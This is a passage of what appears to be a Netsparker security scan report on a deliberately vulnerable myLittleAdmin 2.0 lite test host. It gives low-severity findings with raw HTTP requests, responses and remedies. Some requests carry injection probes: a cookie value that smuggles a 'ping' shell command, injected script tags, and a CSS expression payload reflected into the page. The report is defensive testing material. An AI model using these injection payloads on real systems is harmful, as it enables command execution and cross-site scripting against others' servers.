if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

Identification Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:02 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:02 GMT
Content-Length: 1632


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=</a style=x:expre/**/ssion(netsparker(0x0003E5))>;Address=</a style=x:expre/**/ssion(netsparker(0x0003E5))>,3;Network =3;Database=3;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /mla2000/scripts/pref/default.asp

/mla2000/scripts/pref/default.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/default.asp?refresh=1

Parameters

Parameter Type Value
refresh GET 1

Request

GET /mla2000/scripts/pref/default.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/display.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=True&ShowSysDatabase=True&Lng=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=True&PageSize=%22%26+ping+%2Dn+26+127%2E0%2E0%2E1+%26&ShowSysFunction=True&ShowSysProcedure=True&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=%3Cscript%3Ens%280x00069C%29%3C%2Fscript%3E&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=IMHDKDPDAIEBEAIHJBDAFMOG
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:53:08 GMT
Content-Length: 1208


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>500 - Internal server error.</h2>
<h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
</fieldset></div>
</div>
</body>
</html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /mla2000/scripts/conn/dsnless.asp

/mla2000/scripts/conn/dsnless.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp

Identified Field Name

mla_conn_password

Request

GET /mla2000/scripts/conn/dsnless.asp HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: ASPSESSIONIDQATCTSCC=DCHDKDPDFNKIEINKNMKFBOPO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:46:01 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:46:00 GMT
Content-Length: 1793


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>
<P CLASS="treeinfo"><A HREF="../hlp/default.asp">myLittleAdmin</A> \ <A HREF="../conn/default.asp">Connection</A> \ <A HREF="../conn/dsnless.asp">DSN-less</A></P>

<FORM NAME="mla_conn" METHOD=POST ACTION="dsnless.asp">
<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form">
<TR><TD CLASS="caption" COLSPAN=4><IMG SRC="../../themes/classic/images/mylittletree/server.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALIGN="MIDDLE" ALT="Connection"> Connection</TD></TR>
<TR>
<TD CLASS="formlabel">Data Source :</TD>
<TD><INPUT TYPE="text" NAME="mla_conn_datasource" CLASS="alphanumeric" TITLE="Data Source"></TD>
<TD CLASS="formlabel">Port :</TD>
<TD><INPUT TYPE="text" NAME="mla_conn_portnumber" CLASS="numeric" TITLE="Port"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Initial Catalog :</TD>
<TD COLSPAN=3><INPUT TYPE="text" NAME="mla_conn_initialcatalog" CLASS="alphanumeric" TITLE="Initial Catalog"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Provider :</TD>
<TD COLSPAN=3>
<INPUT TYPE="radio" NAME="mla_conn_provider" VALUE="SQLOLEDB" ID="mla_conn_provider_1" CHECKED><LABEL FOR="mla_conn_provider_1">SQLOLEDB</LABEL> &nbsp;
<INPUT TYPE="radio" NAME="mla_conn_provider" VALUE="ODBC" ID="mla_conn_provider_2"><LABEL FOR="mla_conn_provider_2">ODBC</LABEL>
</TD>
</TR>
<TR>
<TD CLASS="formlabel">Network Library :</TD>
<TD>
<SELECT NAME="mla_conn_networklibrary">
<OPTION VALUE="">Default</OPTION>
<OPTION VALUE="dbnmpntw">Named Pipes</OPTION>
<OPTION VALUE="dbmssocn">Winsock TCP/IP</OPTION>
<OPTION VALUE="dbmsspxn">SPX/IPX</OPTION>
<OPTION VALUE="dbmsvinn">Banyan Vines</OPTION>
<OPTION VALUE="dbmsrpcn">Multi-Protocol (RPC)</OPTION>
</SELECT>
</TD>
<TD CLASS="formlabel">Trusted :</TD>
<TD><INPUT TYPE="checkbox" NAME="mla_conn_trusted"></TD>
</TR>
<TR>
<TD CLASS="formlabel">User Name :</TD>
<TD COLSPAN=3><INPUT TYPE="text" NAME="mla_conn_user" CLASS="alphanumeric" TITLE="User Name"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Password :</TD>
<TD COLSPAN=3><INPUT TYPE="password" NAME="mla_conn_password" CLASS="alphanumeric" TITLE="Password"></TD>
</TR>
<TR><TD COLSPAN=4>&nbsp;</TD></TR>
<TR>
<TD COLSPAN=3 CLASS="formlabel">Save this information into a cookie :</TD><TD><INPUT TYPE="checkbox" NAME="mla_conn_cookie"></TD>
</TR>
<TR><TD COLSPAN=4>&nbsp;</TD></TR>
<TR>
<TD COLSPAN=4 ALIGN=CENTER>
<INPUT TYPE="reset" VALUE="Reset" NAME="mla_conn_reset"> &nbsp;
<INPUT TYPE="submit" VALUE="Connect" NAME="mla_conn_submit">
</TD>
</TR>
</TABLE>
</FORM>

<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
document.mla_conn.mla_conn_datasource.value = "";
document.mla_conn.mla_conn_portnumber.value = "";
setRadioValue(document.mla_conn.mla_conn_provider, "", "");
setSelectValue(document.mla_conn.mla_conn_networklibrary, "", "");
document.mla_conn.mla_conn_initialcatalog.value = "";
document.mla_conn.mla_conn_trusted.checked = false;
document.mla_conn.mla_conn_user.value = "";
document.mla_conn.mla_conn_password.value = "";

if (window.parent.frames['Tree']) window.parent.frames['Tree'].oTree.expandNode('M1');
//-->
</SCRIPT>

</BODY>
</HTML>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Identified Cookie

ASPSESSIONIDQATCTSCC

Request

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:45:54 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQATCTSCC=BCHDKDPDAFJENELKKEICLIIC; path=/
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:45:53 GMT
Content-Length: 1519


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>

</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
TRACE / TRACK Identified

TRACE / TRACK Identified

1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

- /mla2000/scripts/hlp/connected.asp

/mla2000/scripts/hlp/connected.asp CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1

Request

TRACE /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Length: 3999
Content-Type: text/html; Charset=iso-8859-1
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:45:54 AM
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQATCTSCC=DCHDKDPDFNKIEINKNMKFBOPO; path=/
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:45:53 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>

</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /mla2000/scripts/

/mla2000/scripts/ CONFIRMED

http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/

Request

GET /mla2000/scripts/ HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/hlp/connected.asp?refresh=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:45:53 GMT
Content-Length: 1233


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
